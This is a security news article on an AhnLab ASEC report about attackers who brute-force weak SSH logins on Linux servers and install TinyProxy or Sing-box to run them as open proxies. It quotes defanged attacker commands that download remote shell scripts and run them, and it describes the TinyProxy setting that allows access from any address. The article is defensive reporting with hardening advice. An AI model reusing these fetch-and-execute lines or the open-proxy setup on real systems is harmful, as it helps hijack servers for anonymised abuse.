Linux

Linux SSH Servers Under Siege – Hackers Deploying TinyProxy and Sing-box Proxy Tools

The AhnLab Security Intelligence Center (ASEC) has sounded the alarm over a new wave of cyberattacks targeting Linux servers with weak or default SSH credentials.

Using sophisticated honeypots, ASEC has observed a sharp rise in attacks that exploit misconfigured servers to deploy proxy tools specifically, TinyProxy and Sing-box.

Unlike traditional malware, these attacks leverage legitimate open-source software, making detection and response more challenging for system administrators.

Attackers Favor Legitimate Tools to Evade Detection

ASEC discovered that compromised Linux servers are being converted into proxy nodes with almost surgical precision.

Attackers, after brute-forcing SSH logins, execute simple yet effective commands to deploy their payloads. In one observed scenario, the following command was used to download and launch a malicious Bash script:

text(wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh

This script installs TinyProxy via the system’s package manager and configures it accordingly.

By purging restrictive “Allow” and “Deny” lines and inserting “Allow 0.0.0.0/0” into the configuration file, attackers grant unrestricted external access through TinyProxy’s default port 8888.

This effectively transforms the server into an open proxy, potentially enabling a range of anonymized cyber activities, such as DDoS operations and accessing illegal content.

Sing-box: Multipurpose Proxy for Bypassing Geo-blocks

Another alarming case involves the deployment of Sing-box, a powerful, open-source proxy tool capable of supporting multiple advanced protocols (vmess-argo, vless-reality, Hysteria2, TUICv5). Attackers gain elevated access, then run scripts like:

textbash <(curl -Ls hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh)

textwget hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -O ssh_tool.sh

Initially developed to bypass regional restrictions on services like ChatGPT and Netflix, Sing-box is now being exploited by threat actors who install it on foreign Virtual Private Servers (VPS) for profit or anonymity.

Sing-box GitHub Page

With unauthorized Sing-box instances, attackers can reroute their traffic, evade law enforcement, or sell proxy access on underground markets.

Recommendations: Securing Linux Against Proxy Abuse

This growing trend of abusing open-source proxies highlights the need for heightened server security. ASEC recommends that all Linux server administrators:

Enforce strong, regularly updated SSH passwords and disable root login where possible.
Patch systems promptly to close known vulnerabilities.
Deploy firewalls and monitor server access to restrict unwanted connections.
Use reputable security solutions, such as AhnLab’s V3, to detect and remediate malware early.

Proactive defense and vigilant monitoring are crucial in preventing servers from being recruited into illicit proxy networks that increasingly utilize legitimate tools to evade detection.